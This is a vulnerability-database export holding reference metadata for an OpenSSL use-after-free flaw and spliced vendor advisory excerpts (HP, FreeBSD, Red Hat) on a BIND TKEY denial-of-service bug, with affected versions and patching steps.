"http://btsc.webapps.blackberry.com/btsc/viewdocument.do;jsessionid=98ec479ee69ccb916d2ea4b09943faf5?nocount=true\u0026externalid=kb36051\u0026sliceid=1\u0026cmd=\u0026forward=nonthreadedkc\u0026command=show\u0026kcid=kb36051\u0026viewe" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04355095" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04368264" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04347622" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04345210" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349175" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349789" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349897" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04378799" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04379485" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678356" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004830" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676041" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10071" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/29a7e-50e49f9c009f9/cert_security_mini_bulletin_xrx14g_for_77xx_v1.1.pdf" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020200" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory8.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 0.3, "url": "http://forums.alienvault.com/discussion/3054/security-advisory-alienvault-v4-10-0-addresses-several-vulnerabilities" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-345106.htm" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021009" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678104" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682025" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21690128" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004695" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03b" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03c" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03f" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020952" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-bd9a1cf60e344c549c4888db93" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-3395d737d98f42149125b9bb05" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-e8076c2a35804685ad65b2b1ba" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0224.html" }, { "trust": 0.2, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0198.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://access.redhat.com/site/articles/904433" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2010-5298.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3470.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0221.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0195.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5298" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0224" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3470" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0198" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/362.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2010-5298" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=33860" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2192-1/" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-511c3e0b2f6f4f6bbc796fc619" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-3a7aa5e233904ebe847a5e1555" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-d775367b0a28449ca05660778b" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4618" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2520" }, { "trust": 0.1, "url": "https://support.emc.com/downloads/2732_documentum-server" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2521" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-f6c141a7feeb4a358bbb28300f" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-c0d32bac154a4d93839d8cd1f2" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-8aefeaf490284a7691eca97d13" }, { "trust": 0.1, "url": "https://access.redhat.com/site/solutions/905793" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1796" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-6549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0064" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1774" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1899" }, { "trust": 0.1, "url": "http://web.nvd.nist.gov/view/vuln/search" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1798" }, { "trust": 0.1, "url": "https://support.emc.com/products/28224_unisphere-central" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2137" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0311" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1792" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0914" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0349" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0020" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0268" }, { "trust": 0.1, "url": "http://nvd.nist.gov)" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1767" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3389" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1860" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-6085" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0231" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5885" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0913" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1797" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107" }, { "trust": 0.1, "url": "http://nvd.nist.gov/home.cfm." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-6548" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1772" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0195" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3566" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3513" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150319.txt" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150108.txt" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0221" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0076" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3567" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "http://h17007.www1.hp.com/us/en/enterprise/servers/products/service_pack/hpsu" }, { "trust": 0.1, "url": "https://twitter.com/vmwaresrc" }, { "trust": 0.1, "url": "http://www.vmware.com/security/advisories" }, { "trust": 0.1, "url": "http://kb.vmware.com/kb/1055" }, { "trust": 0.1, "url": "http://kb.vmware.com/kb/2077359" }, { "trust": 0.1, "url": "https://www.vmware.com/support/policies/lifecycle.html" }, { "trust": 0.1, "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce" }, { "trust": 0.1, "url": "https://www.vmware.com/support/policies/security_response.html" }, { "trust": 0.1, "url": "https://www.vmware.com/patchmgr/download.portal" }, { "trust": 0.1, "url": "http://h18013.www1.hp.com/products/servers/management/hpsim/download.html" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.1, "url": "http://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library/ind" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.13" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1c-3ubuntu2.8" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2192-1" }, { "trust": 0.1, "url": "https://access.redhat.com/site/solutions/906703" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0628.html" } ], "sources": [ { "db": "VULMON", "id": "CVE-2010-5298" }, { "db": "BID", "id": "66801" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127923" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "126927" }, { "db": "PACKETSTORM", "id": "130188" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127326" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "126481" }, { "db": "PACKETSTORM", "id": "126930" }, { "db": "NVD", "id": "CVE-2010-5298" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2010-5298" }, { "db": "BID", "id": "66801" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127923" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "126927" }, { "db": "PACKETSTORM", "id": "130188" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127326" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "126481" }, { "db": "PACKETSTORM", "id": "126930" }, { "db": "NVD", "id": "CVE-2010-5298" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-14T00:00:00", "db": "VULMON", "id": "CVE-2010-5298" }, { "date": "2014-04-13T00:00:00", "db": "BID", "id": "66801" }, { "date": "2014-07-06T18:53:39", "db": "PACKETSTORM", "id": "127362" }, { "date": "2014-08-19T16:52:04", "db": "PACKETSTORM", "id": "127923" }, { "date": "2014-08-08T21:53:16", "db": "PACKETSTORM", "id": "127807" }, { "date": "2014-06-05T15:17:27", "db": "PACKETSTORM", "id": "126927" }, { "date": "2015-01-30T22:43:20", "db": "PACKETSTORM", "id": "130188" }, { "date": "2015-03-27T20:42:44", "db": "PACKETSTORM", "id": "131044" }, { "date": "2017-01-25T21:54:44", "db": "PACKETSTORM", "id": "140720" }, { "date": "2014-07-02T21:43:37", "db": "PACKETSTORM", "id": "127326" }, { "date": "2014-06-11T23:18:46", "db": "PACKETSTORM", "id": "127045" }, { "date": "2014-06-05T21:13:52", "db": "PACKETSTORM", "id": "126961" }, { "date": "2014-08-26T11:11:00", "db": "PACKETSTORM", "id": "128001" }, { "date": "2014-05-05T17:16:01", "db": "PACKETSTORM", "id": "126481" }, { "date": "2014-06-05T15:19:35", "db": "PACKETSTORM", "id": "126930" }, { "date": "2014-04-14T22:38:08.590000", "db": "NVD", "id": "CVE-2010-5298" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-08-29T00:00:00", "db": "VULMON", "id": "CVE-2010-5298" }, { "date": "2017-05-23T16:24:00", "db": "BID", "id": "66801" }, { "date": "2022-08-29T20:53:02.917000", "db": "NVD", "id": "CVE-2010-5298" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "66801" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL \u0027ssl3_release_read_buffer()\u0027 Use-After-Free Memory Corruption Vulnerability", "sources": [ { "db": "BID", "id": "66801" } ], "trust": 0.3 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "66801" } ], "trust": 0.3 } }
var-201507-0037
Vulnerability from variot
named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries. ISC BIND is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause a denial-of-service.
Release Date: 2015-08-18 Last Updated: 2015-08-18
Potential Security Impact: Remote Denial of Service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running BIND. This vulnerability could be exploited remotely to create a Denial of Service (DoS).
References:
CVE-2015-5477 CVE-2014-8500 SSRT102211
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11 running BIND 9.3.2 prior to C.9.3.2.14.0 HP-UX B.11.23 running BIND 9.3.2 prior to C.9.3.2.14.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-5477 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2014-8500 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided updated versions of the BIND service to resolve this vulnerability.
BIND 9.3.2 for HP-UX Release Depot Name Download location
B.11.11 (PA and IA) HP_UX_11.11_DNSUPGRADE_C.9.3.2.14.0_HP-UX_B.11.11_32_64.depot https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumbe r=BIND
BIND 9.3.2 for HP-UX Release Depot Name Download location
B.11.23 (PA and IA) HP_UX_11.23_DNSUPGRADE_C.9.3.2.14.0_HP-UX_B.11.23_IA_PA.depot https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumbe r=BIND
MANUAL ACTIONS: Yes - Update Download and install the software update
PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
BindUpgrade.BIND-UPGRADE action: install revision C.9.3.2.14.0 or subsequent
HP-UX B.11.23
BindUpgrade.BIND-UPGRADE BindUpgrade.BIND2-UPGRADE action: install revision C.9.3.2.14.0 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 18 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
============================================================================= FreeBSD-SA-15:17.bind Security Advisory The FreeBSD Project
Topic: BIND remote denial of service vulnerability
Category: contrib Module: bind Announced: 2015-07-28 Credits: ISC Affects: FreeBSD 8.x and FreeBSD 9.x. Corrected: 2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE) 2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21) 2015-07-28 19:58:54 UTC (stable/8, 8.4-STABLE) 2015-07-28 19:59:22 UTC (releng/8.4, 8.4-RELEASE-p35) CVE Name: CVE-2015-5477
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
II.
III. Impact
A remote attacker can trigger a crash of a name server. Both recursive and authoritative servers are affected, and the exposure can not be mitigated by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling, before checks enforcing those boundaries.
IV. Workaround
No workaround is available, but systems that are not running BIND are not vulnerable.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. A reboot is recommended but not required.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
The named service has to be restarted after the update. A reboot is recommended but not required.
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
fetch https://security.FreeBSD.org/patches/SA-15:17/bind.patch
fetch https://security.FreeBSD.org/patches/SA-15:17/bind.patch.asc
gpg --verify bind.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart the applicable daemons, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r285977 releng/8.4/ r285980 stable/9/ r285977 releng/9.3/ r285980
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. This issue was addressed by updating BIND to version 9.9.7-P2. CVE-ID CVE-2015-5477
OS X Server v4.1.5 may be obtained from the Mac App Store. VCX prior to 9.8.18 with OpenSSH or ISC BIND.
-
VCX 9.8.18 for the following Products/SKUs:
-
J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
HISTORY Version:1 (rev.1) - 28 January 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Platform Patch Kit Name
Alpha OpenVMS V8.4 QXCM1001434254_4652022589_2015-08-28.BCK
ITANIUM OpenVMS V8.4 QXCM1001434254_4652022589_2015-08-28.BCK
NOTE: Please contact OpenVMS Technical Support to request these patch kits. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: bind security update Advisory ID: RHSA-2016:0078-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0078.html Issue date: 2016-01-28 CVE Names: CVE-2014-8500 CVE-2015-5477 CVE-2015-5722 CVE-2015-8000 =====================================================================
- Summary:
Updated bind packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.4 and 6.5 Advanced Update Support.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Server AUS (v. 6.4) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server AUS (v. 6.5) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.4) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.5) - i386, ppc64, s390x, x86_64
- Description:
The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.
